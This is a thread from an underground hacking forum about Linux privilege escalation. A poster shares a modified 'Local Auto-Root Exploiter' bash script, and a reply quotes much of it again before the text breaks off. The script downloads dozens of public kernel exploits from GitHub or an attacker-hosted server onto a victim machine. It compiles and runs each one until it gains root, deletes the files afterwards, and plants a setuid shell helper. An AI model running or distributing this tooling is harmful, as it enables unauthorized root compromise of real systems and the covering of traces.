HTDark | Underground Hacking Forum and Cybersecurity Community
  • Earn real money by being active: Hello Guest, earn real money by simply being active on the forum — post quality content, get reactions, and help the community. Once you reach the minimum credit amount, you’ll be able to withdraw your balance directly. Learn how it works.

linux privilege escalation commands

Status
Not open for further replies.
i am really looking for these command hope u are going to proivide private commands 

 
bash818 said:
Windows

This link is hidden for visitors. Please Log in or register now.


Linux

This link is hidden for visitors. Please Log in or register now.
Click to expand...
bash818nice scripts LARA.sh bash818, but when i checked, there  links not worked in this script, i modified it and here is working bash script

#!/bin/bash

bold=`tput bold`
normal=`tput sgr0`
red='\e[0;31m'
yellow='\e[1;33m'
blue='\e[1;34m'
light_green='\e[1;32m'
light_cyan='\e[1;36m'
cyan='\e[0;36m'
red='\e[0;31m'
light_red='\e[1;31m'
brown='\e[0;33m'
no_color='\e[0m'

#com_url='$gaddress/linux/local'
#x86_64_url='$gaddress/lin_x86-64/local'
#x86_url='$gaddress/lin_x86/local'
#sploits_url='$saddress/sploits'

function lauto_root(){

    echo -e "\n${light_green}${bold}###################################################"
    echo -e "${light_green}${bold}#            ${light_red}Local Auto-Root Exploiter            ${light_green}#"
    echo -e "${light_green}${bold}#               By ${light_red}Enigma Dimitri                 ${light_green}#"
    echo -e "${light_green}${bold}#           ${yellow}Inspired by Auto Root Exploit         ${light_green}#"
    echo -e "${light_green}${bold}#               By Nilotpal Biswas                #"
    echo -e "${light_green}${bold}###################################################"
}    

function desc(){

    echo -e "\n${light_red}${bold}Usage: ${yellow}$0 [${light_green}option${yellow}]\n"
    echo -e "${light_red}${bold}Options: ${no_color}\n"
    echo -e "${bold}${yellow} -a  or --arsenal: ${light_green} Downloads the exploits to /var/www/html directory and start the apache server."
    echo -e "${bold}${yellow} -l <Attacker-IP>  or --Lroot <Attacker-IP>: ${light_green} Get the exploits from attackers machine and starts the exploiter."
    echo -e "${bold}${yellow} -r  or --Rroot: ${light_green} Downloads the exploits directly to the server and starts the exploiter.\n"
    echo -e "${bold}${light_red}Command Examples: \n"
    echo -e "${light_red}Create Local Arsenal: ${yellow}$0 -a"
    echo -e "${light_red}LAN Root: ${yellow}$0 -l 10.10.10.123"
    echo -e "${light_red}Remote Root: ${yellow}$0 -r \n"
}

function local_dir(){

    sudo rm -r /var/www/html/exploits
    # Creating the required Directories
    sudo mkdir /var/www/html/exploits
    sudo mkdir /var/www/html/exploits/gitex
    sudo mkdir /var/www/html/exploits/linux
    sudo mkdir /var/www/html/exploits/linux/local
    sudo mkdir /var/www/html/exploits/linux_x86-64
    sudo mkdir /var/www/html/exploits/linux_x86-64/local
    sudo mkdir /var/www/html/exploits/linux_x86
    sudo mkdir /var/www/html/exploits/linux_x86/local
    sudo mkdir /var/www/html/exploits/sploits
}

function arsenal(){

    # Getting the common exploits to local directory
    cd /var/www/html/exploits/linux/local

    echo -e "Downloading exploits to ${light_red}${bold}" $(pwd) "${light_green}"

    sudo wget --no-check-certificate $gaddress/linux/local/2031.c 
    sudo wget --no-check-certificate $gaddress/linux/local/17391.c 
    sudo wget --no-check-certificate $gaddress/linux/local/18411.c 
    sudo wget --no-check-certificate $gaddress/linux/local/33321.c 
    sudo wget --no-check-certificate $gaddress/linux/local/35161.c 
    sudo wget --no-check-certificate $gaddress/linux/local/5092.c 
    sudo wget --no-check-certificate $gaddress/linux/local/8572.c  
    sudo wget --no-check-certificate $gaddress/linux/local/25202.c 
    sudo wget --no-check-certificate $gaddress/linux/local/33322.c 
    sudo wget --no-check-certificate $gaddress/linux/local/40812.c 
    sudo wget --no-check-certificate $gaddress/linux/local/37292.c 
    sudo wget --no-check-certificate $gaddress/linux/local/2013.c 
    sudo wget --no-check-certificate $gaddress/linux/local/5093.c 
    sudo wget --no-check-certificate $gaddress/linux/local/8673.c 
    sudo wget --no-check-certificate $gaddress/linux/local/10613.c 
    sudo wget --no-check-certificate $gaddress/linux/local/40003.c 
    sudo wget --no-check-certificate $gaddress/linux/local/2004.c 
    sudo wget --no-check-certificate $gaddress/linux/local/15704.c 
    sudo wget --no-check-certificate $gaddress/linux/local/25444.c 
    sudo wget --no-check-certificate $gaddress/linux/local/30604.c 
    sudo wget --no-check-certificate $gaddress/linux/local/33824.c 
    sudo wget --no-check-certificate $gaddress/linux/local/41994.c 
    sudo wget --no-check-certificate $gaddress/linux/local/2005.c 
    sudo wget --no-check-certificate $gaddress/linux/local/15285.c 
    sudo wget --no-check-certificate $gaddress/linux/local/41995.c 
    sudo wget --no-check-certificate $gaddress/linux/local/2006.c 
    sudo wget --no-check-certificate $gaddress/linux/local/40616.c 
    sudo wget --no-check-certificate $gaddress/linux/local/33336.c 
    sudo wget --no-check-certificate $gaddress/linux/local/39166.c 
    sudo wget --no-check-certificate $gaddress/linux/local/41886.c 
    sudo wget --no-check-certificate $gaddress/linux/local/1397.c 
    sudo wget --no-check-certificate $gaddress/linux/local/27297.c 
    sudo wget --no-check-certificate $gaddress/linux/local/39277.c 
    sudo wget --no-check-certificate $gaddress/linux/local/718.c 
    sudo wget --no-check-certificate $gaddress/linux/local/8678.c 
    sudo wget --no-check-certificate $gaddress/linux/local/41458.c 
    sudo wget --no-check-certificate $gaddress/linux/local/40839.c 
    sudo wget --no-check-certificate $gaddress/linux/local/35370.c 
    sudo wget --no-check-certificate $gaddress/linux/local/38390.c 
    sudo wget --no-check-certificate $gaddress/linux/local/39230.c
    sudo wget --no-check-certificate $gaddress/linux/local/42183.c

    #bash exploits
    sudo wget --no-check-certificate $gaddress/linux/local/2011.sh 
    sudo wget --no-check-certificate $gaddress/linux/local/8478.sh 
    sudo wget --no-check-certificate $gaddress/linux/local/10018.sh 

    #python exploits
    sudo wget --no-check-certificate $gaddress/linux/local/9844.py 
    sudo wget --no-check-certificate $gaddress/linux/local/12130.py 

    # Getting 64bit only exploits to lin_x86-64 directory
    cd /var/www/html/exploits/lin_x86-64/local

    echo -e "Downloading exploits to ${light_red}${bold}" $(pwd) "${light_green}"

    sudo wget --no-check-certificate $gaddress/linux_x86-64/local/40871.c 
    sudo wget --no-check-certificate $gaddress/linux_x86-64/local/15024.c
    sudo wget --no-check-certificate $gaddress/linux_x86-64/local/24746.c
    sudo wget --no-check-certificate $gaddress/linux_x86-64/local/33516.c
    sudo wget --no-check-certificate $gaddress/linux_x86-64/local/31347.c
    sudo wget --no-check-certificate $gaddress/linux_x86-64/local/33589.c 
    sudo wget --no-check-certificate $gaddress/linux_x86-64/local/40049.c

    # Getting 32-bit only exploit to lin_x86 directory
    cd /var/www/html/exploits/lin_x86/local

    echo -e "Downloading exploits to ${light_red}${bold}" $(pwd) "${light_green}"

    sudo wget --no-check-certificate $gaddress/linux_x86/local/9542.c

    # Getting the compressed exploits to sploits directory
    cd /var/www/html/exploits/sploits

    echo -e "Downloading exploits to ${light_red}${bold}" $(pwd) "${light_green}"

    sudo wget --no-check-certificate $saddress/bin-sploits/9191.tgz
    sudo wget --no-check-certificate $saddress/bin-sploits/39772.zip
    sudo wget --no-check-certificate $saddress/bin-sploits/29714.tgz
    sudo wget --no-check-certificate $saddress/bin-sploits/9191.tgz
    sudo wget --no-check-certificate $saddress/bin-sploits/33395.tgz
    sudo wget --no-check-certificate $saddress/bin-sploits/40489.zip

    # Getting CVE-2016-2384 exploit to gitex directory 
    cd /var/www/html/exploits/gitex

    echo -e "Downloading exploits to ${light_red}${bold}" $(pwd) "${light_green}"

    sudo wget --no-check-certificate $gitaddress/poc.c
    sudo wget --no-check-certificate $gitaddress/poc.py
}

function valid_ip()
{
    if ! [ "$2" ]; then
        echo -e "${red}${bold}IP Not Provided, Please provide an IP"
    else
        if [[ "$ip" =~ ^([0-9]{1,3})[.]([0-9]{1,3})[.]([0-9]{1,3})[.]([0-9]{1,3})$ ]] ;then

            for (( i=1; i<${#BASH_REMATCH[@]}; ++i ))
            do
              (( ${BASH_REMATCH[$i]} <= 255 )) || { echo "Invalid IP address!!!" >&2; exit 1; }
            done
        else
            echo -e "${light_green}========================================"
            echo -e "#  ${light_red}Proceding to access the address...  ${light_green}#"
            echo -e "========================================"
            exit 1;
        fi
    fi
}

#gaddress=$1'/exploits'
#saddress=$1'/exploits'
#gitaddress=$1'/exploits/gitex'
function exploiter(){

    checkroot() {
        if [ $(id -u) == 0 ]; then
        echo
        echo -e "${light_red}Successfully R00T(ed).. have fun :)"
        id=$(id)
        echo -e "${light_red}ID     => ${light_green}" $id
        who=$(whoami)
        echo -e "${light_red}WHOAMI => ${light_green}" $who
        exit
        else
        echo ""
        echo -e "${light_red}R00Ting.. ${light_green}"
        sleep 1
        fi
    }
    ccmpl(){
        gcc exploit.c -o exploit -lutil -lpthread
        ./exploit
        ./a.out
        rm exploit
        rm exploit.c
        rm a.out
        checkroot;
        gcc exploit.c -m32 -O2 -o exploit
        ./exploit
        ./a.out
        rm exploit
        rm exploit.c
        rm a.out
        checkroot;
        gcc exploit.c -O2 -o exploit
        ./exploit
        ./a.out
        rm exploit
        rm exploit.c
        rm a.out
        checkroot;
        gcc exploit.c -o exploit
        ./exploit
        ./a.out
        rm exploit
        rm exploit.c
        rm a.out
        checkroot;
        gcc exploit.c -o exploit -lkeyutils -Wall
        ./exploit
        ./a.out
        rm exploit
        rm exploit.c
        rm a.out
        checkroot;
        gcc exploit.c -o exploit -lpthread
        ./exploit
        ./a.out
        rm exploit
        rm exploit.c
        rm a.out
        checkroot;
        gcc exploit.c -o exploit -pthread
        ./exploit
        ./a.out
        rm exploit
        rm exploit.c
        rm a.out
        checkroot;
        gcc exploit.c -o exploit -static -Wall
        ./exploit
        ./a.out
        rm exploit
        rm exploit.c
        rm a.out
        checkroot;
        gcc exploit.c -o exploit -Wall
        ./exploit
        ./a.out
        rm exploit
        rm exploit.c
        rm a.out
        checkroot;
        gcc -fPIC -shared -o exploit exploit.c -ldl -w
        ./exploit
        ./a.out
        rm exploit
        rm exploit.c
        rm a.out
        checkroot;
        gcc -O2 exploit.c
        gcc -O2 -fomit-frame-pointer exploit.c -o exploit
        ./exploit
        ./a.out
        rm exploit
        rm exploit.c
        rm a.out
        checkroot;
        gcc -o exploit exploit.c
        ./exploit
        ./a.out
        rm exploit
        rm exploit.c
        rm a.out
        checkroot;
        gcc -o exploit exploit.c -static -O2
        ./exploit
        ./a.out
        rm exploit
        rm exploit.c
        rm a.out
        checkroot;
        gcc -pthread exploit.c -o exploit -lcrypt
        ./exploit
        ./a.out
        rm exploit
        rm exploit.c
        rm a.out
        checkroot;
        gcc -Wall -m64 -o exploit exploit.c
        ./exploit
        ./a.out
        rm exploit
        rm exploit.c
        rm a.out
        checkroot;
        gcc -Wall -o exploit exploit.c
        ./exploit
        ./a.out
        rm exploit
        rm exploit.c
        rm a.out
        checkroot;
    }
    shcmpl(){
        bash exploit.sh
        rm exploit.sh
        rm *.c
        checkroot;
    }
    pycmpl(){
        python exploit.py
        rm exploit.py
        rm *.c
        checkroot;
    }
    echo -e "${light_red}Auto R00Ting started...${light_green}"

    checkroot;
    #c
    wget --no-check-certificate $gaddress/linux/local/2031.c -O exploit.c
    ccmpl;
    wget --no-check-certificate $gaddress/linux/local/17391.c -O exploit.c
    ccmpl;
    wget --no-check-certificate $gaddress/linux/local/18411.c -O exploit.c
    ccmpl;
    wget --no-check-certificate $gaddress/linux/local/33321.c -O exploit.c
    ccmpl;
    wget --no-check-certificate $gaddress/linux/local/35161.c -O exploit.c
    ccmpl;
    wget --no-check-certificate $gaddress/linux_x86-64/local/40871.c -O exploit.c
    ccmpl;
    wget --no-check-certificate $gaddress/linux/local/5092.c -O exploit.c
    ccmpl;
    wget --no-check-certificate $gaddress/linux/local/8572.c -O exploit.c
    ccmpl;
    wget --no-check-certificate $gaddress/linux_x86/local/9542.c -O exploit.c
    ccmpl;
    wget --no-check-certificate $gaddress/linux/local/25202.c -O exploit.c
    ccmpl;
    wget --no-check-certificate $gaddress/linux/local/33322.c -O exploit.c
    ccmpl;
    wget --no-check-certificate $gaddress/linux/local/40812.c -O exploit.c
    ccmpl;
    wget --no-check-certificate $gaddress/linux/local/37292.c -O exploit.c
    ccmpl;
    wget --no-check-certificate $gaddress/linux/local/2013.c -O exploit.c
    ccmpl;
    wget --no-check-certificate $gaddress/linux/local/5093.c -O exploit.c
    ccmpl;
    wget --no-check-certificate $gaddress/linux/local/8673.c -O exploit.c
    ccmpl;
    wget --no-check-certificate $gaddress/linux/local/10613.c -O exploit.c
    ccmpl;
    wget --no-check-certificate $gaddress/linux/local/40003.c -O exploit.c
    ccmpl;
    wget --no-check-certificate $gaddress/linux/local/2004.c -O exploit.c
    ccmpl;
    wget --no-check-certificate $gaddress/linux_x86-64/local/15024.c -O exploit.c
    ccmpl;
    wget --no-check-certificate $gaddress/linux/local/15704.c -O exploit.c
    ccmpl;
    wget --no-check-certificate $gaddress/linux/local/25444.c -O exploit.c
    ccmpl;
    wget --no-check-certificate $gaddress/linux/local/30604.c -O exploit.c
    ccmpl;
    wget --no-check-certificate $gaddress/linux/local/33824.c -O exploit.c
    ccmpl;
    wget --no-check-certificate $gaddress/linux/local/41994.c -O exploit.c
    ccmpl;
    wget --no-check-certificate $gaddress/linux/local/2005.c -O exploit.c
    ccmpl;
    wget --no-check-certificate $gaddress/linux/local/15285.c -O exploit.c
    ccmpl;
    wget --no-check-certificate $gaddress/linux/local/41995.c -O exploit.c
    ccmpl;
    wget --no-check-certificate $gaddress/linux/local/2006.c -O exploit.c
    ccmpl;
    wget --no-check-certificate $gaddress/linux/local/40616.c -O exploit.c
    ccmpl;
    wget --no-check-certificate $gaddress/linux_x86-64/local/24746.c -O exploit.c
    ccmpl;
    wget --no-check-certificate $gaddress/linux/local/33336.c -O exploit.c
    ccmpl;
    wget --no-check-certificate $gaddress/linux_x86-64/local/33516.c -O exploit.c
    ccmpl;
    wget --no-check-certificate $gaddress/linux/local/39166.c -O exploit.c
    ccmpl;
    wget --no-check-certificate $gaddress/linux/local/41886.c -O exploit.c
    ccmpl;
    wget --no-check-certificate $gaddress/linux/local/1397.c -O exploit.c
    ccmpl;
    wget --no-check-certificate $gaddress/linux/local/27297.c -O exploit.c
    ccmpl;
    wget --no-check-certificate $gaddress/linux_x86-64/local/31347.c -O exploit.c
    ccmpl;
    wget --no-check-certificate $gaddress/linux/local/39277.c -O exploit.c
    ccmpl;
    wget --no-check-certificate $gaddress/linux/local/718.c -O exploit.c
    ccmpl;
    wget --no-check-certificate $gaddress/linux/local/8678.c -O exploit.c
    ccmpl;
    wget --no-check-certificate $gaddress/linux/local/41458.c -O exploit.c
    ccmpl;
    wget --no-check-certificate $gaddress/linux/local/40839.c -O exploit.c
    ccmpl;
    wget --no-check-certificate $gaddress/linux_x86-64/local/33589.c -O exploit.c
    ccmpl;
    wget --no-check-certificate $gaddress/linux_x86-64/local/40049.c -O exploit.c
    ccmpl;
    wget --no-check-certificate $gaddress/linux/local/35370.c -O exploit.c
    ccmpl;
    wget --no-check-certificate $gaddress/linux/local/38390.c -O exploit.c
    ccmpl;
    wget --no-check-certificate $gaddress/linux/local/39230.c -O exploit.c
    ccmpl;
    wget --no-check-certificate $gaddress/linux/local/42183.c -O exploit.c
    ccmpl;

    #sh
    wget --no-check-certificate $gaddress/linux/local/2011.sh -O exploit.sh
    shcmpl;
    wget --no-check-certificate $gaddress/linux/local/8478.sh -O exploit.sh
    shcmpl;
    wget --no-check-certificate $gaddress/linux/local/10018.sh -O exploit.sh
    shcmpl;

    #py
    wget --no-check-certificate $gaddress/linux/local/9844.py -O exploit.py
    pycmpl;
    wget --no-check-certificate $gaddress/linux/local/12130.py -O exploit.py
    pycmpl;

    #txt
    #platforms/linux/local/9191.txt
    wget --no-check-certificate $saddress/bin-sploits/9191.tgz
    tar -zxf 9191.tgz
    cd cheddar_bay
    bash cheddar_bay.sh
    cc -fno-stack-protector -o exploit exploit.c
    ./exploit
    cc -fno-stack-protector -DRHEL5_SUCKS -o exploit exploit.c
    ./exploit
    cd ..
    rm -rf cheddar_bay
    rm -rf 9191.tgz
    tar -zxf 33395.tgz
    cd ext4_own
    bash ext4_own.sh
    cd ..
    rm -rf ext4_own
    rm -rf 33395.tgz
    checkroot;
    #platforms/linux/local/39772.txt
    wget --no-check-certificate $saddress/bin-sploits/39772.zip
    cd 39772
    unzip 39772.zip
    tar -xf exploit.tar
    cd ebpf_mapfd_doubleput_exploit
    bash compile.sh
    ./hello
    ./doubleput
    ./suidhelper
    cd ..
    rm -rf ebpf_mapfd_doubleput_exploit
    rm -rf exploit.tar
    checkroot;
    tar -xf crasher.tar
    cd ebpf_mapfd_doubleput_crasher
    bash compile.sh
    ./doubleput
    cd ..
    rm -rf ebpf_mapfd_doubleput_crasher
    rm -rf 39772
    rm -rf 39772.zip
    checkroot;
    #platforms/linux/local/23674.txt
    smbmount --version
    ls -l /usr/bin/smbmount
    ls -l /usr/bin/smbmnt
    echo "main(){setuid(0);setgid(0);system("/bin/bash");}" > a.c
    make a
    cc a.c -o a
    chmod +s a
    share:/etc/samba/smb.conf
    /etc/samba/smb.conf
    [share]
    path = /data/share
    writable = no
    locking = no
    public = yes
    guest ok = yes
    comment = Share
    ls -l a
    ls -l pokus/a
    id
    checkroot;
    #platforms/linux/local/29714.txt
    wget --no-check-certificate $saddress/bin-sploits/29714.tgz
    tar -zxf 29714.tgz
    cd exploit
    make
    make install
    cd ..
    rm -rf exploit
    rm -rf 29714.tgz
    checkroot;
    wget --no-check-certificate $saddress/bin-sploits/9191.tgz
    tar -zxf 9191.tgz
    cd cheddar_bay
    bash cheddar_bay.sh
    cc -fno-stack-protector -o exploit exploit.c
    ./exploit
    cc -fno-stack-protector -DRHEL5_SUCKS -o exploit exploit.c
    ./exploit
    cd ..
    rm -rf cheddar_bay
    rm -rf 9191.tgz
    tar -zxf 33395.tgz
    cd ext4_own
    bash ext4_own.sh
    cd ..
    rm -rf ext4_own
    rm -rf 33395.tgz
    checkroot;
    #platforms/linux/local/33395.txt
    wget $saddress/bin-sploits/33395.tgz
    tar -zxf 33395.tgz
    cd ext4_own
    bash ext4_own.sh
    checkroot;
    cd ..
    rm -rf ext4_own
    rm -rf 33395.tgz
    #platforms/linux/local/40489.txt
    wget --no-check-certificate $saddress/bin-sploits/40489.zip
    unzip 40489.zip
    cd 40489
    bash compile.sh
    ./pwn
    ./enjoy
    cd ..
    rm -rf 40489
    rm -rf 40489.zip
    checkroot;
    #platforms/linux/local/41770.txt
    # #!/bin/bash
    # (./ProcReadHelper /proc/$$/syscall) &
    # sleep 1
    # exec /usr/bin/passwd
    # #!/bin/bash
    # echo "Current pid is $$"
    # (sleep 10; echo 127 ) > /proc/$$/coredump_filter &
    # sleep 5
    # exec /usr/bin/passwd
    # static ssize_t mem_read(struct file * file, char __user * buf,
    #                         size_t count, loff_t *ppos) {
    #     if (file->private_data != (void*)((long)current->self_exec_id))
    #         goto out_put;
    # #!/bin/bash
    # (sleep 3; echo 15) > /proc/$$/oom_adj &
    # exec /usr/bin/passwd
    # checkroot;
    #platforms/linux/local/38559.txt
    rmmod b43
    modprobe b43 fwpostfix=AA%xBB
    dmesg
    checkroot;
    #platforms/linux/local/41999.txt
    wget --no-check-certificate $gitaddress/poc.c -O poc.c
    gcc poc.c -masm=intel
    ./a.out 0
    checkroot;
    ./a.out 1
    checkroot;
    ./a.out 2
    checkroot;
    ./a.out 3
    checkroot;
    ./a.out 4
    checkroot;
    ./a.out 5
    checkroot;
    ./a.out 6
    checkroot;
    ./a.out 7
    checkroot;
    ./a.out 8
    checkroot;
    ./a.out 9
    checkroot;
    ./a.out 10
    checkroot;
    rm a.out
    rm poc.c
    wget --no-check-certificate $gitaddress/poc.py -O poc.py
    python poc.py
    checkroot;
    rm poc.py
    rm a.out
    rm exploit
    
    echo -e "${light_red}Srry.. I tried hard, but no luck this time.. Wait for update :("
    exit 1;
}

if ! [ "$1" ] || [ "$1" == '-h' ]  || [ "$1" == '--help' ] ; then #|| ! [ "$2" ]; then
    lauto_root
    desc
fi

if [ "$1" == '-a' ] || [ "$1" == '--arsenal' ] ; then
    lauto_root
    sleep 2 
    echo -e "\n${light_green}=================================="
    echo -e "#   ${light_red}Initiating Arsenal script   ${light_green} #"
    echo -e "==================================\n"
    # original line gaddress='https://raw.githubusercontent.com/offensive-security/exploit-database/master/platforms'
    gaddress='https://raw.githubusercontent.com/offensive-security/exploit-database/master/exploits'
    # original line saddress='https://github.com/offensive-security/exploit-database-bin-sploits/raw/master'
    saddress='https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/'
    gitaddress='https://raw.githubusercontent.com/xairy/kernel-exploits/master/CVE-2016-2384'
    gitaddress='https://raw.githubusercontent.com/xairy/kernel-exploits/master/CVE-2016-9793'
    gitaddress='https://raw.githubusercontent.com/xairy/kernel-exploits/master/CVE-2017-1000112'
    gitaddress='https://raw.githubusercontent.com/xairy/kernel-exploits/master/CVE-2017-6074'
    gitaddress='https://raw.githubusercontent.com/xairy/kernel-exploits/master/CVE-2017-7308'
    local_dir
    arsenal
    echo -e "${light_green}=========================="
    echo -e "#   ${light_red}Local Arsenal Set..  ${light_green}#"
    echo -e "==========================\n"
    echo -e "${light_green}=========================="
    echo -e "#   ${light_red}Starting Apache2     ${light_green}#"
    echo -e "==========================\n"
    /bin/bash -i /etc/init.d/apache2 start
    /bin/bash -i /etc/init.d/apache2 status
    echo -e "${light_green}=================================="
    echo -e "#    ${light_red}Run Exploiter on Victim     ${light_green}#"
    echo -e "==================================\n"

    exit 1;
fi 

if [ "$1" == '-l' ] || [ "$1" == '--Lroot' ] ; then
    lauto_root
    if ! [ "$2" ]; then
        echo -e "\n${light_red}No IP address provided!!!\n"
        exit 1;
    else     
        ip=$2
    fi

    if [[ "$ip" =~ ^([0-9]{1,3})[.]([0-9]{1,3})[.]([0-9]{1,3})[.]([0-9]{1,3})$ ]] ;then

        for (( i=1; i<${#BASH_REMATCH[@]}; ++i ))
        do
          (( ${BASH_REMATCH[$i]} <= 255 )) || { echo "Invalid IP address!!!" >&2; exit 1; }
        done
    else
        echo -e "${light_green}========================================"
        echo -e "#  ${light_red}Proceding to access the address...  ${light_green}#"
        echo -e "========================================\n"
    fi    

    sleep 2 
    echo -e "${light_green}=================================="
    echo -e "#   ${light_red}Initiating Local Exploiter   ${light_green}#"
    echo -e "==================================\n"
    gaddress='http://'${ip}'/exploits'
    saddress='http://'${ip}'/exploits'
    gitaddress='http://'${ip}'/exploits/gitex'
    exploiter
    exit 1;
fi

if [ "$1" == '-r' ] || [ "$1" == '--Rroot' ] ; then
    lauto_root
    gaddress='https://raw.githubusercontent.com/offensive-security/exploit-database/master/exploits'
    saddress='https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/'
    sleep 2 
    echo -e "${light_green}==================================="
    echo -e "#   ${light_red}Initiating Remote Exploiter   ${light_green}#"
    echo -e "===================================\n"
    exploiter
    exit 1;
fi
thanks for share

 
D4rkn3S said:
nice scripts LARA.sh bash818, but when i checked, there  links not worked in this script, i modified it and here is working bash script

#!/bin/bash

bold=`tput bold`
normal=`tput sgr0`
red='\e[0;31m'
yellow='\e[1;33m'
blue='\e[1;34m'
light_green='\e[1;32m'
light_cyan='\e[1;36m'
cyan='\e[0;36m'
red='\e[0;31m'
light_red='\e[1;31m'
brown='\e[0;33m'
no_color='\e[0m'

#com_url='$gaddress/linux/local'
#x86_64_url='$gaddress/lin_x86-64/local'
#x86_url='$gaddress/lin_x86/local'
#sploits_url='$saddress/sploits'

function lauto_root(){

    echo -e "\n${light_green}${bold}###################################################"
    echo -e "${light_green}${bold}#            ${light_red}Local Auto-Root Exploiter            ${light_green}#"
    echo -e "${light_green}${bold}#               By ${light_red}Enigma Dimitri                 ${light_green}#"
    echo -e "${light_green}${bold}#           ${yellow}Inspired by Auto Root Exploit         ${light_green}#"
    echo -e "${light_green}${bold}#               By Nilotpal Biswas                #"
    echo -e "${light_green}${bold}###################################################"
}    

function desc(){

    echo -e "\n${light_red}${bold}Usage: ${yellow}$0 [${light_green}option${yellow}]\n"
    echo -e "${light_red}${bold}Options: ${no_color}\n"
    echo -e "${bold}${yellow} -a  or --arsenal: ${light_green} Downloads the exploits to /var/www/html directory and start the apache server."
    echo -e "${bold}${yellow} -l <Attacker-IP>  or --Lroot <Attacker-IP>: ${light_green} Get the exploits from attackers machine and starts the exploiter."
    echo -e "${bold}${yellow} -r  or --Rroot: ${light_green} Downloads the exploits directly to the server and starts the exploiter.\n"
    echo -e "${bold}${light_red}Command Examples: \n"
    echo -e "${light_red}Create Local Arsenal: ${yellow}$0 -a"
    echo -e "${light_red}LAN Root: ${yellow}$0 -l 10.10.10.123"
    echo -e "${light_red}Remote Root: ${yellow}$0 -r \n"
}

function local_dir(){

    sudo rm -r /var/www/html/exploits
    # Creating the required Directories
    sudo mkdir /var/www/html/exploits
    sudo mkdir /var/www/html/exploits/gitex
    sudo mkdir /var/www/html/exploits/linux
    sudo mkdir /var/www/html/exploits/linux/local
    sudo mkdir /var/www/html/exploits/linux_x86-64
    sudo mkdir /var/www/html/exploits/linux_x86-64/local
    sudo mkdir /var/www/html/exploits/linux_x86
    sudo mkdir /var/www/html/exploits/linux_x86/local
    sudo mkdir /var/www/html/exploits/sploits
}

function arsenal(){

    # Getting the common exploits to local directory
    cd /var/www/html/exploits/linux/local

    echo -e "Downloading exploits to ${light_red}${bold}" $(pwd) "${light_green}"

    sudo wget --no-check-certificate $gaddress/linux/local/2031.c 
    sudo wget --no-check-certificate $gaddress/linux/local/17391.c 
    sudo wget --no-check-certificate $gaddress/linux/local/18411.c 
    sudo wget --no-check-certificate $gaddress/linux/local/33321.c 
    sudo wget --no-check-certificate $gaddress/linux/local/35161.c 
    sudo wget --no-check-certificate $gaddress/linux/local/5092.c 
    sudo wget --no-check-certificate $gaddress/linux/local/8572.c  
    sudo wget --no-check-certificate $gaddress/linux/local/25202.c 
    sudo wget --no-check-certificate $gaddress/linux/local/33322.c 
    sudo wget --no-check-certificate $gaddress/linux/local/40812.c 
    sudo wget --no-check-certificate $gaddress/linux/local/37292.c 
    sudo wget --no-check-certificate $gaddress/linux/local/2013.c 
    sudo wget --no-check-certificate $gaddress/linux/local/5093.c 
    sudo wget --no-check-certificate $gaddress/linux/local/8673.c 
    sudo wget --no-check-certificate $gaddress/linux/local/10613.c 
    sudo wget --no-check-certificate $gaddress/linux/local/40003.c 
    sudo wget --no-check-certificate $gaddress/linux/local/2004.c 
    sudo wget --no-check-certificate $gaddress/linux/local/15704.c 
    sudo wget --no-check-certificate $gaddress/linux/local/25444.c 
    sudo wget --no-check-certificate $gaddress/linux/local/30604.c 
    sudo wget --no-check-certificate $gaddress/linux/local/33824.c 
    sudo wget --no-check-certificate $gaddress/linux/local/41994.c 
    sudo wget --no-check-certificate $gaddress/linux/local/2005.c 
    sudo wget --no-check-certificate $gaddress/linux/local/15285.c 
    sudo wget --no-check-certificate $gaddress/linux/local/41995.c 
    sudo wget --no-check-certificate $gaddress/linux/local/2006.c 
    sudo wget --no-check-certificate $gaddress/linux/local/40616.c 
    sudo wget --no-check-certificate $gaddress/linux/local/33336.c 
    sudo wget --no-check-certificate $gaddress/linux/local/39166.c 
    sudo wget --no-check-certificate $gaddress/linux/local/41886.c 
    sudo wget --no-check-certificate $gaddress/linux/local/1397.c 
    sudo wget --no-check-certificate $gaddress/linux/local/27297.c 
    sudo wget --no-check-certificate $gaddress/linux/local/39277.c 
    sudo wget --no-check-certificate $gaddress/linux/local/718.c 
    sudo wget --no-check-certificate $gaddress/linux/local/8678.c 
    sudo wget --no-check-certificate $gaddress/linux/local/41458.c 
    sudo wget --no-check-certificate $gaddress/linux/local/40839.c 
    sudo wget --no-check-certificate $gaddress/linux/local/35370.c 
    sudo wget --no-check-certificate $gaddress/linux/local/38390.c 
    sudo wget --no-check-certificate $gaddress/linux/local/39230.c
    sudo wget --no-check-certificate $gaddress/linux/local/42183.c

    #bash exploits
    sudo wget --no-check-certificate $gaddress/linux/local/2011.sh 
    sudo wget --no-check-certificate $gaddress/linux/local/8478.sh 
    sudo wget --no-check-certificate $gaddress/linux/local/10018.sh 

    #python exploits
    sudo wget --no-check-certificate $gaddress/linux/local/9844.py 
    sudo wget --no-check-certificate $gaddress/linux/local/12130.py 

    # Getting 64bit only exploits to lin_x86-64 directory
    cd /var/www/html/exploits/lin_x86-64/local

    echo -e "Downloading exploits to ${light_red}${bold}" $(pwd) "${light_green}"

    sudo wget --no-check-certificate $gaddress/linux_x86-64/local/40871.c 
    sudo wget --no-check-certificate $gaddress/linux_x86-64/local/15024.c
    sudo wget --no-check-certificate $gaddress/linux_x86-64/local/24746.c
    sudo wget --no-check-certificate $gaddress/linux_x86-64/local/33516.c
    sudo wget --no-check-certificate $gaddress/linux_x86-64/local/31347.c
    sudo wget --no-check-certificate $gaddress/linux_x86-64/local/33589.c 
    sudo wget --no-check-certificate $gaddress/linux_x86-64/local/40049.c

    # Getting 32-bit only exploit to lin_x86 directory
    cd /var/www/html/exploits/lin_x86/local

    echo -e "Downloading exploits to ${light_red}${bold}" $(pwd) "${light_green}"

    sudo wget --no-check-certificate $gaddress/linux_x86/local/9542.c

    # Getting the compressed exploits to sploits directory
    cd /var/www/html/exploits/sploits

    echo -e "Downloading exploits to ${light_red}${bold}" $(pwd) "${light_green}"

    sudo wget --no-check-certificate $saddress/bin-sploits/9191.tgz
    sudo wget --no-check-certificate $saddress/bin-sploits/39772.zip
    sudo wget --no-check-certificate $saddress/bin-sploits/29714.tgz
    sudo wget --no-check-certificate $saddress/bin-sploits/9191.tgz
    sudo wget --no-check-certificate $saddress/bin-sploits/33395.tgz
    sudo wget --no-check-certificate $saddress/bin-sploits/40489.zip

    # Getting CVE-2016-2384 exploit to gitex directory 
    cd /var/www/html/exploits/gitex

    echo -e "Downloading exploits to ${light_red}${bold}" $(pwd) "${light_green}"

